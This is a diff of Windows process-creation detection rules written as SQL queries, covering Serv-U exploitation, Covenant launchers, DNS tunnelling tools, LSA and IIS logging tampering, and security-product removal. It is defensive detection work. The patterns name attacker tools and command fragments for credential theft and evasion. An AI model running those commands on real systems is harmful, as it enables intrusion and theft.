"author": "Florian Roth (Nextron Systems)", + "title": "Renamed BrowserCore.EXE Execution", + "id": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", + "status": "experimental", + "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1136.001", - "cve.2021.35211" + "attack.t1528", + "attack.t1036.003" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%whoami%' ESCAPE '\\' AND ((CommandLine LIKE '%./Client/Common/%' ESCAPE '\\' OR CommandLine LIKE '%.\\\\Client\\\\Common\\\\%' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\Serv-U.bat%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'BrowserCore.exe' AND NOT ((NewProcessName LIKE '%\\\\BrowserCore.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2021_35211_servu.yml" + "filename": "proc_creation_win_renamed_browsercore.yml" }, { - "title": "HackTool - Hashcat Password Cracker Execution", - "id": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", + "title": "WhoAmI as Parameter", + "id": "e9142d84-fbe0-401d-ac50-3e519fb00c89", "status": "test", - "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", - "author": "frack113", + "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1110.002" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Tools that use similar command line flags and values" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\hashcat.exe' ESCAPE '\\' OR (CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-m 1000 %' ESCAPE '\\' AND CommandLine LIKE '%-r %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%.exe whoami%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_hashcat.yml" + "filename": "proc_creation_win_susp_whoami_as_param.yml" }, { - "title": "LSA PPL Protection Disabled Via Reg.EXE", - "id": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", + "title": "Suspicious Serv-U Process Pattern", + "id": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", "status": "experimental", - "description": "Detects the usage of the \"reg.exe\" utility to disable PPL protection on the LSA process", + "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.010" + "attack.credential_access", + "attack.t1555", + "cve.2021.35211" ], "falsepositives": [ - "Unlikely" + "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND CommandLine LIKE '% /v RunAsPPL %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Serv-U.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_lsa_ppl_protection_disabled.yml" + "filename": "proc_creation_win_servu_susp_child_process.yml" }, { - "title": "Wab/Wabmig Unusual Parent Or Child Processes", - "id": "63d1ccc0-2a43-4f4b-9289-361b308991ff", + "title": "Execute Pcwrun.EXE To Leverage Follina", + "id": "6004abd0-afa4-4557-ba90-49d172e0a299", "status": "experimental", - "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", + "attack.t1218", "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\pcwrun.exe' ESCAPE '\\' AND CommandLine LIKE '%../%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wab_unusual_parents.yml" + "filename": "proc_creation_win_lolbin_pcwrun_follina.yml" }, { - "title": "Disable Windows IIS HTTP Logging", - "id": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", - "status": "experimental", - "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", - "author": "frack113", + "title": "HackTool - Covenant PowerShell Launcher", + "id": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", + "status": "test", + "description": "Detects suspicious command lines used in Covenant luanchers", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1562.002" - ], - "falsepositives": [ - "Unknown" + "attack.t1059.001", + "attack.t1564.003" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:httplogging%' ESCAPE '\\' AND CommandLine LIKE '%dontLog:true%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%-Sta%' ESCAPE '\\' AND CommandLine LIKE '%-Nop%' ESCAPE '\\' AND CommandLine LIKE '%-Window%' ESCAPE '\\' AND CommandLine LIKE '%Hidden%' ESCAPE '\\' AND (CommandLine LIKE '%-Command%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\')) OR (CommandLine LIKE '%sv o (New-Object IO.MemorySteam);sv d %' ESCAPE '\\' OR CommandLine LIKE '%mshta file.hta%' ESCAPE '\\' OR CommandLine LIKE '%GruntHTTP%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand cwB2ACAAbwAgA%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_iis_appcmd_http_logging.yml" + "filename": "proc_creation_win_hktl_covenant.yml" }, { - "title": "Potential LethalHTA Technique Execution", - "id": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", + "title": "Suspicious Splwow64 Without Params", + "id": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", "status": "test", - "description": "Detects potential LethalHTA technique where the \"mshta.exe\" is spwaned by an \"svchost.exe\" process", - "author": "Markus Neis", + "description": "Detects suspicious Splwow64.exe process without any command line parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.005" + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\splwow64.exe' ESCAPE '\\' AND CommandLine LIKE '%splwow64.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_mshta_lethalhta_technique.yml" + "filename": "proc_creation_win_splwow64_cli_anomaly.yml" }, { - "title": "Suspicious Schtasks Schedule Types", - "id": "24c8392b-aa3c-46b7-a545-43f71657fe98", + "title": "Suspicious Shells Spawned by Java", + "id": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", "status": "experimental", - "description": "Detects scheduled task creations or modification on a suspicious schedule type", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious shell spawned from Java host process (e.g. log4j exploitation)", + "author": "Andreas Hunkeler (@Karneades), Florian Roth", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Legitimate processes that run at logon. Filter according to your environment" + "Legitimate calls to system binaries", + "Company specific internal usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_schedule_type.yml" + "filename": "proc_creation_win_java_susp_child_process.yml" }, { - "title": "DNS Exfiltration and Tunneling Tools Execution", - "id": "98a96a5a-64a0-4c42-92c5-489da3866cb0", + "title": "MpiExec Lolbin", + "id": "729ce0ea-5d8f-4769-9762-e35de441586d", "status": "test", - "description": "Well-known DNS Exfiltration tools execution", - "author": "Daniil Yugoslavskiy, oscd.community", + "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048.001", - "attack.command_and_control", - "attack.t1071.004", - "attack.t1132.001" + "attack.execution", + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\iodine.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dnscat2%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mpiexec.exe' ESCAPE '\\' OR Imphash = 'd8b52ef6aaa3a81501bdfff9dbb96217' OR Hashes LIKE '%IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217%' ESCAPE '\\') AND (CommandLine LIKE '% /n 1 %' ESCAPE '\\' OR CommandLine LIKE '% -n 1 %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml" + "filename": "proc_creation_win_lolbin_mpiexec.yml" }, { - "title": "File With Suspicious Extension Downloaded Via Bitsadmin", - "id": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", + "title": "Potential Tampering With RDP Related Registry Keys Via Reg.EXE", + "id": "0d5675be-bc88-4172-86d3-1e96a4476536", "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of \"reg.exe\" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' values", + "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.lateral_movement", + "attack.t1021.001", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.asax%' ESCAPE '\\' OR CommandLine LIKE '%.ashx%' ESCAPE '\\' OR CommandLine LIKE '%.asmx%' ESCAPE '\\' OR CommandLine LIKE '%.asp%' ESCAPE '\\' OR CommandLine LIKE '%.aspx%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cfm%' ESCAPE '\\' OR CommandLine LIKE '%.cgi%' ESCAPE '\\' OR CommandLine LIKE '%.chm%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jsp%' ESCAPE '\\' OR CommandLine LIKE '%.jspx%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.psm1%' ESCAPE '\\' OR CommandLine LIKE '%.scf%' ESCAPE '\\' OR CommandLine LIKE '%.sct%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.war%' ESCAPE '\\' OR CommandLine LIKE '%.wsf%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.rar%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\Terminal Server%' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD%' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')) AND ((CommandLine LIKE '%Licensing Core%' ESCAPE '\\' AND CommandLine LIKE '%EnableConcurrentSessions%' ESCAPE '\\') OR (CommandLine LIKE '%WinStations\\\\RDP-Tcp%' ESCAPE '\\' OR CommandLine LIKE '%MaxInstanceCount%' ESCAPE '\\' OR CommandLine LIKE '%fEnableWinStation%' ESCAPE '\\' OR CommandLine LIKE '%TSUserEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSAppCompat%' ESCAPE '\\' OR CommandLine LIKE '%IdleWinStationPoolCount%' ESCAPE '\\' OR CommandLine LIKE '%TSAdvertise%' ESCAPE '\\' OR CommandLine LIKE '%AllowTSConnections%' ESCAPE '\\' OR CommandLine LIKE '%fSingleSessionPerUser%' ESCAPE '\\' OR CommandLine LIKE '%fDenyTSConnections%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_bitsadmin_download_susp_extensions.yml" + "filename": "proc_creation_win_reg_rdp_keys_tamper.yml" }, { - "title": "Logon Scripts (UserInitMprLogonScript)", - "id": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", + "title": "Regsvr32 Flags Anomaly", + "id": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", "status": "test", - "description": "Detects creation or execution of UserInitMprLogonScript persistence method", - "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", + "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1037.001", - "attack.persistence" + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ - "Exclude legitimate logon scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%UserInitMprLogonScript%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%netlogon%.bat%' ESCAPE '\\' OR CommandLine LIKE '%UsrLogon.cmd%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\WINDOWS\\\\Explorer.EXE%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\proquota.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Citrix\\\\System32\\\\icast.exe' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '% /i:%' ESCAPE '\\') AND NOT (CommandLine LIKE '% /n %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_persistence_userinitmprlogonscript.yml" + "filename": "proc_creation_win_regsvr32_flags_anomaly.yml" }, { - "title": "VMToolsd Suspicious Child Process", - "id": "5687f942-867b-4578-ade7-1e341c46e99a", + "title": "Regsvr32 Spawning Explorer", + "id": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", "status": "experimental", - "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", - "author": "behops, Bhabesh Raj", + "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", + "author": "elhoim", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1059" + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ - "Legitimate use by administrator" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'RUNDLL32.EXE', 'REGSVR32.EXE', 'wscript.exe', 'cscript.exe'))) AND NOT ((CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweron-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweroff-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\resume-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\suspend-vm-default.bat%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_vmware_vmtoolsd_susp_child_process.yml" + "filename": "proc_creation_win_regsvr32_spawn_explorer.yml" }, { - "title": "Wusa Extracting Cab Files From Suspicious Paths", - "id": "c74c0390-3e20-41fd-a69a-128f0275a5ea", - "status": "experimental", - "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Tampering With Security Products Via WMIC", + "id": "847d5ff3-8a31-4737-a970-aeae8fe21765", + "status": "test", + "description": "Detects uninstallation or termination of security products using the WMIC utility", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administration" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%product where %' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/nointeractive%' ESCAPE '\\') OR (CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%caption like %' ESCAPE '\\' AND (CommandLine LIKE '%call delete%' ESCAPE '\\' OR CommandLine LIKE '%call terminate%' ESCAPE '\\')) OR (CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%where %' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%carbon\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%cylance\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%endpoint\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%eset\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%malware\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Sophos\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%symantec\\%%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG %' ESCAPE '\\' OR CommandLine LIKE '%Carbon Black%' ESCAPE '\\' OR CommandLine LIKE '%CarbonBlack%' ESCAPE '\\' OR CommandLine LIKE '%Cb Defense Sensor 64-bit%' ESCAPE '\\' OR CommandLine LIKE '%Crowdstrike Sensor%' ESCAPE '\\' OR CommandLine LIKE '%Cylance %' ESCAPE '\\' OR CommandLine LIKE '%Dell Threat Defense%' ESCAPE '\\' OR CommandLine LIKE '%DLP Endpoint%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Detection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Protection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Security%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Sensor%' ESCAPE '\\' OR CommandLine LIKE '%ESET File Security%' ESCAPE '\\' OR CommandLine LIKE '%LogRhythm System Monitor Service%' ESCAPE '\\' OR CommandLine LIKE '%Malwarebytes%' ESCAPE '\\' OR CommandLine LIKE '%McAfee Agent%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft Security Client%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Anti-Virus%' ESCAPE '\\' OR CommandLine LIKE '%Sophos AutoUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Credential Store%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Console%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Database%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Server%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Remote Management System%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Update Manager%' ESCAPE '\\' OR CommandLine LIKE '%Threat Protection%' ESCAPE '\\' OR CommandLine LIKE '%VirusScan%' ESCAPE '\\' OR CommandLine LIKE '%Webroot SecureAnywhere%' ESCAPE '\\' OR CommandLine LIKE '%Windows Defender%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml" + "filename": "proc_creation_win_wmic_uninstall_security_products.yml" }, { - "title": "Service DACL Abuse To Hide Services Via Sc.EXE", - "id": "a537cfc3-4297-4789-92b5-345bfd845ad0", + "title": "Renamed Sysinternals Sdelete Execution", + "id": "c1d867fe-8d95-4487-aab4-e53f2d339f90", "status": "experimental", - "description": "Detects usage of the \"sc.exe\" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.", - "author": "Andreas Hunkeler (@Karneades)", + "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.impact", + "attack.t1485" + ], + "falsepositives": [ + "System administrator usage" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'sdelete.exe' AND NOT ((NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete64.exe' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_renamed_sysinternals_sdelete.yml" + }, + { + "title": "Renamed CreateDump Utility Execution", + "id": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", + "status": "experimental", + "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Command lines that use the same flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName LIKE 